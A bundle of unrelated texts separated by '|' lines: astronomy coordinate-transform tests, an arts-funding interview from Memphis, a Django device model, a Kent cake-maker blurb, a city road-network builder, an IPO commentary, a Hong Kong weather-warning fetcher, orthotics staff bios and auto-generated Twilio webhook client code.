        (Earth, ITRS, GCRS),
        (Mars, MarsFixed, MarsICRS),
        (Jupiter, JupiterFixed, JupiterICRS),
        (Saturn, SaturnFixed, SaturnICRS),
        (Uranus, UranusFixed, UranusICRS),
        (Neptune, NeptuneFixed, NeptuneICRS),
    ],
)
def test_planetary_inertial_fixed_conversion(body, fixed_frame, inertial_frame):
    # Mirror of the fixed->inertial test: going inertial->fixed must also
    # preserve the distance R from the body center.
    with solar_system_ephemeris.set("builtin"):
        epoch = J2000
        inertial_position = inertial_frame(
            0 * u.deg, 0 * u.deg, body.R, obstime=epoch, representation_type="spherical"
        )
        fixed_position = inertial_position.transform_to(fixed_frame(obstime=epoch))
        assert_quantity_allclose(
            fixed_position.spherical.distance, body.R, atol=1e-7 * u.km
        )
        assert_quantity_allclose(
            inertial_position.spherical.distance, body.R, atol=1e-7 * u.km
        )
@pytest.mark.parametrize(
    "body, fixed_frame, inertial_frame",
    [
        (Sun, SunFixed, HCRS),
        (Mercury, MercuryFixed, MercuryICRS),
        (Venus, VenusFixed, VenusICRS),
        (Earth, ITRS, GCRS),
        (Mars, MarsFixed, MarsICRS),
        (Jupiter, JupiterFixed, JupiterICRS),
        (Saturn, SaturnFixed, SaturnICRS),
        (Uranus, UranusFixed, UranusICRS),
        (Neptune, NeptuneFixed, NeptuneICRS),
    ],
)
def test_planetary_inertial_roundtrip_vector(body, fixed_frame, inertial_frame):
    # fixed -> inertial -> fixed over a series of 1000 epochs (10 s apart)
    # must reproduce the original coordinates; exercises the vectorized
    # (array-obstime) code path of the transformations.
    with solar_system_ephemeris.set("builtin"):
        epoch = J2000
        sampling_time = 10 * u.s
        fixed_position = fixed_frame(
            np.broadcast_to(0 * u.deg, (1000,), subok=True),
            np.broadcast_to(0 * u.deg, (1000,), subok=True),
            np.broadcast_to(body.R, (1000,), subok=True),
            representation_type="spherical",
            obstime=epoch + np.arange(1000) * sampling_time,
        )
        inertial_position = fixed_position.transform_to(
            inertial_frame(obstime=epoch + np.arange(1000) * sampling_time)
        )
        fixed_position_roundtrip = inertial_position.transform_to(
            fixed_frame(obstime=epoch + np.arange(1000) * sampling_time)
        )
        assert_quantity_allclose(
            fixed_position.cartesian.xyz,
            fixed_position_roundtrip.cartesian.xyz,
            atol=1e-7 * u.km,
        )
def test_round_trip_from_GeocentricSolarEcliptic_gives_same_results():
    # GCRS -> GSE -> GCRS at the same epoch must be the identity
    # (to within numerical tolerance).
    epoch = Time("J2000")
    start = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
    via_gse = start.transform_to(GeocentricSolarEcliptic(obstime=epoch))
    round_tripped = via_gse.transform_to(GCRS(obstime=epoch))
    assert_quantity_allclose(round_tripped.dec.value, start.dec.value, atol=1e-7)
    assert_quantity_allclose(round_tripped.ra.value, start.ra.value, atol=1e-7)
def test_GeocentricSolarEcliptic_against_data():
    # Reference ecliptic lat/lon for this GCRS coordinate at J2000.
    expected_lon = 233.11691362602866
    expected_lat = 48.64606410986667
    source = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
    ecliptic = source.transform_to(GeocentricSolarEcliptic(obstime=J2000))
    assert_quantity_allclose(ecliptic.lat.value, expected_lat, atol=1e-7)
    assert_quantity_allclose(ecliptic.lon.value, expected_lon, atol=1e-7)
def test_GeocentricSolarEcliptic_raises_error_nonscalar_obstime():
    # A vector (non-scalar) obstime is not supported by this transformation
    # and must raise a ValueError with an explanatory message.
    with pytest.raises(ValueError) as excinfo:
        coord = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
        coord.transform_to(GeocentricSolarEcliptic(obstime=Time(["J3200", "J2000"])))
    expected_msg = (
        "To perform this transformation the "
        "obstime Attribute must be a scalar."
    )
    assert expected_msg in str(excinfo.value)
|
In the study, we explore this idea of “philanthropic redlining,” where essentially certain groups – primarily black- and brown-led organizations – are just excluded from traditional funding. Can you explain how you have experienced that with Memphis Black Arts Alliance or within the nonprofit sector?
I wouldn’t go so far as to say the organizations are completely excluded, but in my opinion, it seems that the funds are “limited.” I would use that word: limited. I say this as someone who’s sat on several grant panels – there was definitely a limited few groups that these organizations gave money to, and that is a tragedy – yet it did not stop Black arts. The thing about artists of color is that we’ve always found a way to do what we want to do! Get mama on the tickets. Get daddy to build the sets. We’ll find a way to make it happen, because we are artists through and through.
What do you think has been a critical piece in MBAA’s survival in this environment, given that some of the major avenues for funding may not have been available or been limited?
First, Memphis Black Arts Alliance was developed as a collaborative organization that had many African-American arts groups, arts organizations and artists that were under its umbrella. So it was easier to get support from certain funders, since they would give a lump sum of money and then MBAA would actually divvy that out amongst its members, depending on the grant, funding several different organizations with one amount.
The organization, over the course of time, changed drastically, where it shifted into a place of actually competing with the very groups that used to exist under that umbrella for funding.
If there was something that I would say was critical to our survival all these years, it would be relationships. My predecessor Bennie West was excellent at developing relationships with funders for the organizations that were under that umbrella. And those relationships never went away. Anytime I go anywhere, they know me because her – that being the case created a foundation for some stability. And also I think having the network of groups being funded was important, too. The art of collaboration. A funder is more apt to want to fund an organization that’s helping bridge gaps and is helping a lot of different people by collaborating with other organizations.
So now that the organization has shifted to more direct service and less of the umbrella, what do you think the challenges are with funding?
At the core, Funders want to see the community improve. But they also need to feel secure. They need to feel that if they’re going to invest a certain amount of money in you, that you can manage it well and you’re going to do what you say you’re going to do with it. So I think the trust component is huge. We have to establish relationships with the funder so that they trust us with their funding. I think that because most funders have relationships with other organizations, white-led organizations, that they just have more of a tendency to trust them. They tend to trust that they will do what they say they’re going to do. That dividing line is there: relationship. And it’s not that black or brown led organizations can’t be trusted – of course we can. But it’s all about the relationship, you know? Have we established trust with them?
How do you see that playing out and how do you try to address it?
Allow me to paint a picture for you: There are some white dancers at a school, let’s say Germantown. They’re great. They’re very talented and very gifted. They approach funders about sending them to a community center in an underserved area like 38126. It’s in a choice neighborhood, recognized by the federal government as an area of concern. The funders like and accept their proposal and they are granted the funding. We see funders do this sort of thing all the time.
Now here comes another organization, let’s call it TriBar, and they have trained African American dancers for many years and are equally talented and gifted. They desire to take their dancers over to the same community center, which is in their neighborhood, and need funding to do so. So they apply. “Well, we’re already sending dancers there.” Unfortunately this happens a lot.
MBAA is going through a similar scenario right now. I think Ballet Memphis or New Ballet Ensemble is currently sending dancers over to a center in 38126 and we’re trying to get our ArtsReach program into that same center, but they have secured the funding for ballet and don’t have the funding for MBAA. So inevitably, we don’t get the funding and we don’t take our program to that center. The tragedy is that the center has mostly African American children and by providing professionally trained African American artists to teach, versus other cultures, could possibly inspire the children to aspire to reach past their current circumstances in a way that other cultures could not. So, how do we break that curse? How do we step in there and change this? I believe that it is literally just being present and developing relationships with our funders; but this is not easy. We have to be determined. We all have to be determined to cross those lines. We have to want it.
How do you think MMI has helped you get over that gap?
I believe that MMI has afforded a lot of organizations the opportunity to show our worthiness. That we are capable of presenting great, wonderful work. We are capable of managing our resources. We are capable of developing strategic plans and sustainability models. We’re capable of doing all of that – all we needed was someone to believe in us, and help us by providing funding and the necessary training to package our work. I think that MMI has helped level the playing field, if you will. It’s still going to take determination to cross those lines, but with all of the things that we’ve learned, we now have what is needed to cross those lines. The upside to all of this is that we no longer cross the lines with nothing in hand anymore. Now we cross the lines, how should you say… “packing.” Now we’ve got something to show you. Boom. We’ve done this. Boom. We’re doing that. Boom and we’ve got this done and we’ve got that done. We’re going in with something in hand demonstrating our capability and worthiness to manage the funding, and that’s how MMI is helping to bridge the gap.
Lar’Juanette Williams is a native Memphian and executive director of the Memphis Black Arts Alliance. Prior to taking the helm at MBAA, Williams spent 25 years away from her hometown after earning degrees in arts communication and theater and arts administration. Her diverse career includes time in city government in Los Angeles, where she directed the Los Angeles Civic Leadership Awards; helping to reestablish the historic Bijou Theater in Knoxville, Tenn.; the creation of Knoxville’s “King Week” through her work with the Martin Luther King Commemoration Commission of Greater Knoxville; and program administration for KAATCH (Knoxville African American Tours of Cultural Heritage), a federally funded program that created East Tennessee’s first virtual tour through downtown Knoxville.
|
#coding=utf-8
from django.db import models
from django.dispatch import receiver
from django.utils.translation import ugettext as _
from django.db.models.signals import pre_save, post_save
import gsx
from servo.models.common import Tag, Attachment
class Device(models.Model):
    """A serviceable customer device, optionally initialised from Apple GSX.

    Field verbose names are in Finnish (the application's UI language);
    English translations are given in the comments below.
    """
    # Serial number ("sarjanumero"); filled from GSX by from_gsx().
    sn = models.CharField(max_length=32, blank=True,
                          verbose_name=_(u'sarjanumero'))
    # Human-readable description ("kuvaus"); default "Uusi laite" = "New device".
    description = models.CharField(max_length=128, default=_('Uusi laite'),
                                   verbose_name=_(u'kuvaus'))
    # Account credentials stored with the device ("käyttäjätunnus" = username).
    username = models.CharField(max_length=32, blank=True, null=True,
                                verbose_name=_(u'käyttäjätunnus'))
    # "salasana" = password. NOTE(review): stored in plain text — confirm this
    # is acceptable for the deployment.
    password = models.CharField(max_length=32, blank=True, null=True,
                                verbose_name=_(u'salasana'))
    # Purchase date ("hankittu" = acquired); a GSX estimate when created
    # via from_gsx().
    purchased_on = models.DateField(blank=True, null=True,
                                    verbose_name=_(u'hankittu'))
    # Free-form notes ("merkinnät" = notes).
    notes = models.TextField(blank=True, null=True,
                             verbose_name=_(u'merkinnät'))
    # Tags ("tagit"); a post_save handler in this module adds a 'device' tag
    # whose title matches the description.
    tags = models.ManyToManyField(Tag, null=True, blank=True,
                                  verbose_name=_(u'tagit'))
    # Arbitrary file attachments.
    files = models.ManyToManyField(Attachment)

    @classmethod
    def from_gsx(cls, sn):
        """
        Search GSX and initialize a new Device with the results
        """
        # GSX warranty lookup exposes serialNumber, productDescription and an
        # estimated purchase date for the given serial number.
        dev = gsx.Product(sn).get_warranty()
        device = Device(sn=dev.serialNumber,
                        description=dev.productDescription,
                        purchased_on=dev.estimatedPurchaseDate)
        device.save()
        return device

    def get_absolute_url(self):
        # Canonical detail-view URL for this device.
        return "/devices/%d/view/" % self.pk

    def spec_id(self):
        # Id of the device's first tag.
        # NOTE(review): raises IndexError when the device has no tags —
        # presumably every device gets one from the post_save handler; confirm.
        return self.tags.all()[0].id

    def __unicode__(self):
        return '%s (%s)' %(self.description, self.sn)

    class Meta:
        app_label = 'servo'
@receiver(post_save, sender=Device)
def create_spec(sender, instance, created, **kwargs):
    """Ensure every freshly created Device carries a 'device' Tag matching
    its description, creating the Tag on first use."""
    if not created:
        return
    spec_tag, _ = Tag.objects.get_or_create(title=instance.description,
                                            type='device')
    instance.tags.add(spec_tag)
    instance.save()
|
Local Food Kent - If you’re planning a party or wedding and want to produce a wow factor, look local for a cakemaker that can turn your vision into a sight to behold.
The cake is the focal point of any celebration, be it a special birthday, Christening or a wedding, so why settle for second best when you can choose a hand-crafted cake or a selection of cupcakes? Choosing a local cakemaker will ensure a bespoke and reliable service that will fit in with your theme. Many delis and farm shops in Kent sell fabulous cakes and you can usually order ahead when you’re catering for a crowd or having a party.
|
"""
Copyright (C) 2017 Open Source Robotics Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from geometry.point import Point
from models.city import City
from models.street import Street
from models.trunk import Trunk
from models.block import Block
from models.building import Building
from models.ground_plane import GroundPlane
from models.road import *
from builders.abstract_city_builder import AbstractCityBuilder
class SimpleCityBuilder(AbstractCityBuilder):
    """Builds a small demo city: an odd-sized square grid of streets with two
    diagonals, surrounded by a ring road of Trunk segments.

    NOTE(review): the entry point is named `_buid_city` (sic) — presumably it
    matches the hook name expected by AbstractCityBuilder; confirm before
    renaming.
    """

    def _buid_city(self):
        """Assemble and return the City model."""
        # Must be odd
        size = 5
        city = City("Simple City")
        # Spacing (in world units) between adjacent grid intersections.
        self.multiplier = 100
        self._create_ground_plane(city, size)
        self._setup_intersections(city, size)
        self._create_inner_streets(city, size)
        self._create_surrounding_ring_road(city, size)
        # Disabling this temporarily as we are focusing on road networks
        # self._create_blocks(city, size)
        # self._create_buildings(city, size)
        return city

    def _setup_intersections(self, city, size):
        """Compute the size x size grid of intersection points and register
        each one with the city.

        Border intersections are nudged 2 units outwards so the surrounding
        ring road does not sit exactly on the inner grid lines.
        NOTE(review): Point is constructed with two args here — presumably z
        defaults to 0; confirm against geometry.point.
        """
        self.intersections = [[Point(self.multiplier * x, self.multiplier * y, 0)
                               for y in range(size)] for x in range(size)]
        # Bottom edge: shift south; the south-east corner also shifts east.
        for x in range(size - 1):
            self.intersections[x][0] = self.intersections[x][0] + Point(0, -2)
        self.intersections[size - 1][0] = self.intersections[size - 1][0] + Point(2, -2)
        # East edge: shift east.
        for y in range(1, size):
            self.intersections[size - 1][y] = self.intersections[size - 1][y] + Point(2, 0)
        # Top edge: shift north; the north-west corner also shifts west.
        for x in range(size - 1):
            self.intersections[size - x - 1][size - 1] = self.intersections[size - x - 1][size - 1] + Point(0, 2)
        self.intersections[0][size - 1] = self.intersections[0][size - 1] + Point(-2, 2)
        # West edge: shift west.
        for y in range(1, size):
            self.intersections[0][size - y - 1] = self.intersections[0][size - y - 1] + Point(-2, 0)
        for x in range(size):
            for y in range(size):
                city.add_intersection_at(self.intersections[x][y])

    def _create_ground_plane(self, city, size):
        """Create a square ground plane centred under the whole grid."""
        ground_plane_size = size * self.multiplier
        ground_plane = GroundPlane(ground_plane_size,
                                   Point(ground_plane_size / 2,
                                         ground_plane_size / 2,
                                         0),
                                   'ground_plane')
        city.set_ground_plane(ground_plane)

    def _create_inner_streets(self, city, size):
        """Add the interior street network: the inner vertical and horizontal
        grid lines (borders are handled by the ring road) plus both diagonals."""
        # Vertical
        for x in range(1, size - 1):
            road = Street()
            for y in range(size):
                road.add_control_point(self.intersections[x][y])
            city.add_road(road)
        # Horizontal
        for y in range(1, size - 1):
            road = Street()
            for x in range(size):
                road.add_control_point(self.intersections[x][y])
            city.add_road(road)
        # Diagonals
        road = Street()
        for i in range(size):
            road.add_control_point(self.intersections[i][i])
        city.add_road(road)
        road = Street()
        for i in range(size):
            road.add_control_point(self.intersections[i][size - i - 1])
        city.add_road(road)

    def _create_surrounding_ring_road(self, city, size):
        """Add four Trunk segments tracing the border of the grid
        (south, east, north, west) as the surrounding ring road."""
        ring_road_1 = Trunk(name='RingRoad1')
        for x in range(size):
            ring_road_1.add_control_point(self.intersections[x][0])
        city.add_road(ring_road_1)
        ring_road_2 = Trunk(name='RingRoad2')
        for y in range(size):
            ring_road_2.add_control_point(self.intersections[size - 1][y])
        city.add_road(ring_road_2)
        ring_road_3 = Trunk(name='RingRoad3')
        for x in range(size):
            ring_road_3.add_control_point(self.intersections[size - x - 1][size - 1])
        city.add_road(ring_road_3)
        ring_road_4 = Trunk(name='RingRoad4')
        for y in range(size):
            ring_road_4.add_control_point(self.intersections[0][size - y - 1])
        city.add_road(ring_road_4)

    def _create_blocks(self, city, size):
        """Fill the space between streets with city blocks.

        Grid cells on the two diagonals receive a pair of triangular blocks
        (split by the diagonal street); every other cell gets a square block.
        Currently disabled by _buid_city.
        """
        blocks_count = size - 1
        block_size = 96
        inital_offset = 50
        street_width = 4
        half_street_width = street_width / 2.0
        triangle_delta = 93
        for x in range(blocks_count):
            for y in range(blocks_count):
                if x == y:
                    # Cell lies on the main diagonal: two triangles flanking it.
                    origin = Point(street_width + 1 + x * self.multiplier,
                                   half_street_width + y * self.multiplier, 0)
                    vertices = [Point(0, 0, 0), Point(triangle_delta, 0, 0), Point(triangle_delta, triangle_delta, 0)]
                    block = Block(origin, vertices)
                    city.add_block(block)
                    origin = Point(half_street_width + x * self.multiplier,
                                   street_width + 1 + y * self.multiplier, 0)
                    vertices = [Point(0, 0, 0), Point(0, triangle_delta, 0), Point(triangle_delta, triangle_delta, 0)]
                    block = Block(origin, vertices)
                    city.add_block(block)
                elif x + y == blocks_count - 1:
                    # Cell lies on the anti-diagonal: mirrored triangle pair.
                    origin = Point(half_street_width + x * self.multiplier,
                                   half_street_width + y * self.multiplier, 0)
                    vertices = [Point(0, 0, 0), Point(triangle_delta, 0, 0), Point(0, triangle_delta, 0)]
                    block = Block(origin, vertices)
                    city.add_block(block)
                    origin = Point((x + 1) * self.multiplier - half_street_width,
                                   street_width + 1 + y * self.multiplier, 0)
                    vertices = [Point(0, 0, 0), Point(0, triangle_delta, 0), Point(-triangle_delta, triangle_delta, 0)]
                    block = Block(origin, vertices)
                    city.add_block(block)
                else:
                    # Ordinary cell: a single square block.
                    origin = Point(inital_offset + x * self.multiplier,
                                   inital_offset + y * self.multiplier, 0)
                    block = Block.square(origin, block_size)
                    city.add_block(block)

    def _create_buildings(self, city, size):
        """Place a 3x3 cluster of square buildings in each grid cell, skipping
        positions too close to either diagonal street.
        Currently disabled by _buid_city.
        """
        blocks_count = size - 1
        building_spacing = 18
        for x in range(blocks_count):
            for y in range(blocks_count):
                for block_x in range(3):
                    for block_y in range(3):
                        pos = Point(x * self.multiplier + block_x * 30 + building_spacing,
                                    y * self.multiplier + block_y * 30 + building_spacing, 0)
                        # Keep clear of both diagonals: |y - x| tests the main
                        # diagonal, |y + x - extent| the anti-diagonal.
                        if abs(pos.y - pos.x) > building_spacing and \
                           abs(pos.y + pos.x - self.multiplier * blocks_count) > building_spacing:
                            building = Building.square(pos, 20, 40)
                            city.add_building(building)
|
FirstChoice IPO Analysis: L&T group IPOs - pricing was wrong.
In the year 2016, there were 2 IPOs from the L&T stable. Larsen & Toubro Infotech Limited and L&T Technology Services Limited.
The first one priced its IPO at Rs 710 and the second one at Rs 860 a share.
Both have disappointed in the exchanges. L&T Infotech is trading at Rs 680, down Rs 30 and L&T Technology stock trading around Rs 805, down Rs 55.
Retail investors had a lot of expectations from these 2 companies, which have been belied.
BRLMs of the above IPOs should introspect. The pricing was very aggressive. Investors, particularly retail, have lost money. Most importantly there is loss of credibility for - both the group and the BRLMs.
Labels: L&T group IPOs - pricing was wrong.
|
"""A module to retrieve weather warning data from Hong Kong Observatory"""
import json
import requests
# Hong Kong Observatory endpoints. Despite the .xml extension, each serves a
# JavaScript assignment ("var weather_warning_summary = {...};") that
# weather_warning() strips down to plain JSON before parsing.
BASE_URL = 'http://www.weather.gov.hk/'
URL_UC = 'wxinfo/json/warnsumc.xml'  # traditional Chinese summary
URL_EN = 'wxinfo/json/warnsum.xml'   # English summary
def weather_warning(lang='UC'):
    """Retrieve the weather warning summary from the Hong Kong Observatory.

    :param lang: 'UC' for traditional Chinese, 'EN' for English.
    :returns: dict with two keys:
        'status' -- 1 on success, 2 on a malformed payload,
                    5 on a network error, 0 for an unsupported language
        'result' -- the parsed warning-summary dict on success, else ''
    """
    response = {}
    if lang in ['UC', 'EN']:
        try:
            if lang == 'UC':
                data = requests.get(BASE_URL + URL_UC)
            if lang == 'EN':
                data = requests.get(BASE_URL + URL_EN)
            # The endpoint returns a JavaScript assignment; strip the
            # "var weather_warning_summary = " prefix and the trailing ";\n"
            # to recover a JSON object.
            data_2 = json.loads(data.text.replace('var weather_warning_summary = ', '')[:-2] + '}')
            response['result'] = data_2
            response['status'] = 1
        except (ValueError, IndexError):
            # json.loads raises ValueError (JSONDecodeError) on a malformed
            # payload. The original code caught only IndexError, which string
            # slicing never raises, so parse failures propagated uncaught.
            response['result'] = ''
            response['status'] = 2
        except requests.exceptions.RequestException:
            response['result'] = ''
            response['status'] = 5
    else:
        response['result'] = ''
        response['status'] = 0
    return response
|
Identical twin brothers Keith and Ken Cornell founded Cornell Orthotics & Prosthetics in 1985. Sharing an uncommon dedication for excellence in their field, the brothers have steadily developed Cornell Orthotics & Prosthetics into a multi-site, patient-care practice in the greater Boston area. The two certified prosthetists and orthotists, along with the rest of our staff, are dedicated to providing exceptional care for whoever walks through our doors.
Keith received his undergraduate degree from Saint Anselm’s College and completed his postgraduate prosthetic coursework at Northwestern and New York Universities. He has been an ABC certified prosthetist since 1980. He was elected to the American Orthotic & Prosthetic Association board of directors in 1999 and served as president in 2004. Locally, he is a past president of the Massachusetts Society of O&P and played a major role in the passing of the “Massachusetts Prosthetic Parity Law”. He is passionate about his field and has a long history of active participation in clinical, business and patient organizations. He is a guest lecturer at North Shore Community College and prosthetic residency director at Cornell O&P. Keith specializes in both upper and lower extremity prosthetics and profoundly enjoys his patient practice. He is the inventor of the patented CJ Socket and founder of the COPAA amputee support association.
Credo: To take the time to listen and understand, then formulate a plan to make a greater improvement than expected.
David began his career with Cornell O & P in 1986. With a BA from Salem State College, he continued post-graduate education in orthotics at Northwestern University. Now an ABC certified Orthotist with many years of experience, David manages a wide spectrum of pathomechanical cases. Chief Orthotist at Franciscan Children’s Hospital and Rehabilitation Center, David specializes in the pediatric population. He provides treatment at both the CP and Brace clinics, as well as managing the orthotic care of the in-patient population and Physical Therapy departments.
Gary joined the Cornell team in 2002. He has over 35 years of work experience and is ABC certified in both Prosthetics and Orthotics. A former owner of two Prosthetic/Orthotic practices, Gary brings with him a wide range of capabilities, including extensive expertise in upper extremity prosthetics and lower extremity orthotics. Gary manages clinics in prosthetics and orthotics for both in-patients and out-patients at the Whittier Rehabilitation Hospital in Bradford, MA, along with many other facilities within the Northern Massachusetts/Southern and Seacoast New Hampshire areas. Gary has served as Chair of the Upper Extremity Prosthetic Society of AAOP and has been a guest speaker at numerous national and regional symposia. He is currently serving on the Advisory Board of AOPA’s Almanac, a monthly industry magazine.
Marc has been a licensed physical therapist assistant since 2000, also an ABC registered orthotic assistant. Marc is also BOC Orthotist. He specializes in most orthopedic and neurological conditions with special interests in spinal pathologies as well as pediatrics. Marc is currently lead practitioner at the new office located at Massachusetts General Hospital Center for Outpatient Care which opened late 2009.
Rob is a Board Certified Prosthetist and a Licensed Physical Therapy Assistant with extensive experience in Orthopedics, Cardiac, Neurological Disorders, Pulmonary, Sports Medicine and Cancer Rehabilitation. He has been with Cornell O&P since 2000 and brings with him over 2 decades of patient care. Rob currently works directly with Keith Cornell in all aspects of patient care and prosthetic design, while also maintaining his own patient base.
Mike Domenicucci has had over 30 years of experience in the field of upper and lower limb prosthetics. He received his ABC certification in prosthetics from Northwestern University. He is a Past President of the New England American Academy of Orthotists and Prosthetists and is still active on its Advisory Board. He has worked extensively with the Veterans Administration fitting American Veterans to the latest prosthetic technologies.
Mike’s latest focus is in research and development of new liner and socket technologies for lower limb prostheses.
Brad Shores, LATC (Licensed Certified Athletic Trainer), BOCO (Board Certified Orthotist). Mr. Shores’ background includes 6 seasons in professional baseball as an athletic trainer with the Kansas City Royals system. He has been the manager and owner of Foot Fitness Plus since 1997 and works for Cornell O & P. He became board certified as an orthotist in 2005, combining the world of professional sports with the world of orthotics and bracing.
Braylan is currently a prosthetic resident at Cornell Orthotics & Prosthetics. She graduated from the University of Hartford Orthotic & Prosthetic master’s program in 2017. She is scheduled to begin her orthotic residency in July of 2018. Braylan is a lacrosse coach and enjoys being active in recreational sports and working with children.
Nicole has been ABC Certified CPO since 2012 and she loves her job. Her education includes a B.S. in Biological Anthropology from Duke University, M.S. in Biomedical Engineering from University of California in Davis, and post-grad certificates in Orthotics and Prosthetics from Northwestern University. She specializes in pediatrics, especially regarding children with neuromuscular involvement, but looks forward to working with more adults. She is experienced with custom lower and upper extremity orthoses as well as bracing for idiopathic and neuromuscular scoliosis, and has been trained in Elaine Owens’ paradigm of AFO alignment.
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
# NOTE: auto-generated Twilio client code; structure intentionally mirrors the
# generator's output.
class WebhookList(ListResource):
    """ PLEASE NOTE that this class contains preview products that are subject
    to change. Use them with caution. If you currently do not have developer
    preview access, please contact help@twilio.com. """

    def __init__(self, version, assistant_sid):
        """
        Initialize the WebhookList

        :param Version version: Version that contains the resource
        :param assistant_sid: The SID of the Assistant that is the parent of the resource

        :returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookList
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookList
        """
        super(WebhookList, self).__init__(version)

        # Path Solution
        self._solution = {'assistant_sid': assistant_sid, }
        self._uri = '/Assistants/{assistant_sid}/Webhooks'.format(**self._solution)

    def stream(self, limit=None, page_size=None):
        """
        Streams WebhookInstance records from the API as a generator stream.
        This operation lazily loads records as efficiently as possible until the limit
        is reached.
        The results are returned as a generator, so this operation is memory efficient.

        :param int limit: Upper limit for the number of records to return. stream()
                          guarantees to never return more than limit.  Default is no limit
        :param int page_size: Number of records to fetch per request, when not set will use
                              the default value of 50 records.  If no page_size is defined
                              but a limit is defined, stream() will attempt to read the
                              limit with the most efficient page size, i.e. min(limit, 1000)

        :returns: Generator that will yield up to limit results
        :rtype: list[twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance]
        """
        limits = self._version.read_limits(limit, page_size)

        # Fetch only the first page eagerly; the version's stream helper pulls
        # further pages lazily as the generator is consumed.
        page = self.page(page_size=limits['page_size'], )

        return self._version.stream(page, limits['limit'])

    def list(self, limit=None, page_size=None):
        """
        Lists WebhookInstance records from the API as a list.
        Unlike stream(), this operation is eager and will load `limit` records into
        memory before returning.

        :param int limit: Upper limit for the number of records to return. list() guarantees
                          never to return more than limit.  Default is no limit
        :param int page_size: Number of records to fetch per request, when not set will use
                              the default value of 50 records.  If no page_size is defined
                              but a limit is defined, list() will attempt to read the limit
                              with the most efficient page size, i.e. min(limit, 1000)

        :returns: Generator that will yield up to limit results
        :rtype: list[twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance]
        """
        # Eager variant of stream(): materialises the generator into a list.
        return list(self.stream(limit=limit, page_size=page_size, ))

    def page(self, page_token=values.unset, page_number=values.unset,
             page_size=values.unset):
        """
        Retrieve a single page of WebhookInstance records from the API.
        Request is executed immediately

        :param str page_token: PageToken provided by the API
        :param int page_number: Page Number, this value is simply for client state
        :param int page_size: Number of records to return, defaults to 50

        :returns: Page of WebhookInstance
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
        """
        # values.of() drops unset parameters so they are omitted from the query.
        data = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })

        response = self._version.page(method='GET', uri=self._uri, params=data, )

        return WebhookPage(self._version, response, self._solution)

    def get_page(self, target_url):
        """
        Retrieve a specific page of WebhookInstance records from the API.
        Request is executed immediately

        :param str target_url: API-generated URL for the requested results page

        :returns: Page of WebhookInstance
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookPage
        """
        response = self._version.domain.twilio.request(
            'GET',
            target_url,
        )

        return WebhookPage(self._version, response, self._solution)

    def create(self, unique_name, events, webhook_url, webhook_method=values.unset):
        """
        Create the WebhookInstance

        :param unicode unique_name: An application-defined string that uniquely identifies the resource
        :param unicode events: The list of space-separated events that this Webhook will subscribe to.
        :param unicode webhook_url: The URL associated with this Webhook.
        :param unicode webhook_method: The method to be used when calling the webhook's URL.

        :returns: The created WebhookInstance
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
        """
        data = values.of({
            'UniqueName': unique_name,
            'Events': events,
            'WebhookUrl': webhook_url,
            'WebhookMethod': webhook_method,
        })

        payload = self._version.create(method='POST', uri=self._uri, data=data, )

        return WebhookInstance(self._version, payload, assistant_sid=self._solution['assistant_sid'], )

    def get(self, sid):
        """
        Constructs a WebhookContext

        :param sid: The unique string that identifies the resource to fetch

        :returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
        """
        return WebhookContext(self._version, assistant_sid=self._solution['assistant_sid'], sid=sid, )

    def __call__(self, sid):
        """
        Constructs a WebhookContext

        :param sid: The unique string that identifies the resource to fetch

        :returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookContext
        """
        # Alias for get(): allows webhooks(sid) as well as webhooks.get(sid).
        return WebhookContext(self._version, assistant_sid=self._solution['assistant_sid'], sid=sid, )

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Autopilot.V1.WebhookList>'
class WebhookPage(Page):
    """A single page of Webhook records returned by the Autopilot API.

    PLEASE NOTE that this class contains preview products that are subject
    to change. Use them with caution. If you currently do not have developer
    preview access, please contact help@twilio.com.
    """

    def __init__(self, version, response, solution):
        """Create a WebhookPage.

        :param Version version: Version that contains the resource
        :param Response response: Response from the API
        :param dict solution: path solution carrying the parent assistant_sid
        """
        super(WebhookPage, self).__init__(version, response)
        # Keep the path solution so records can be built with their parent SID.
        self._solution = solution

    def get_instance(self, payload):
        """Build a WebhookInstance from a raw API payload.

        :param dict payload: payload response from the API
        :rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance
        """
        return WebhookInstance(
            self._version,
            payload,
            assistant_sid=self._solution['assistant_sid'],
        )

    def __repr__(self):
        """Return a machine-friendly representation."""
        return '<Twilio.Autopilot.V1.WebhookPage>'
class WebhookContext(InstanceContext):
    """Context for fetching, updating and deleting one Webhook resource.

    PLEASE NOTE that this class contains preview products that are subject
    to change. Use them with caution. If you currently do not have developer
    preview access, please contact help@twilio.com.
    """

    def __init__(self, version, assistant_sid, sid):
        """Create a WebhookContext.

        :param Version version: Version that contains the resource
        :param assistant_sid: SID of the parent Assistant
        :param sid: unique string identifying the Webhook resource
        """
        super(WebhookContext, self).__init__(version)

        # Path solution and resource URI for this specific webhook.
        self._solution = {'assistant_sid': assistant_sid, 'sid': sid, }
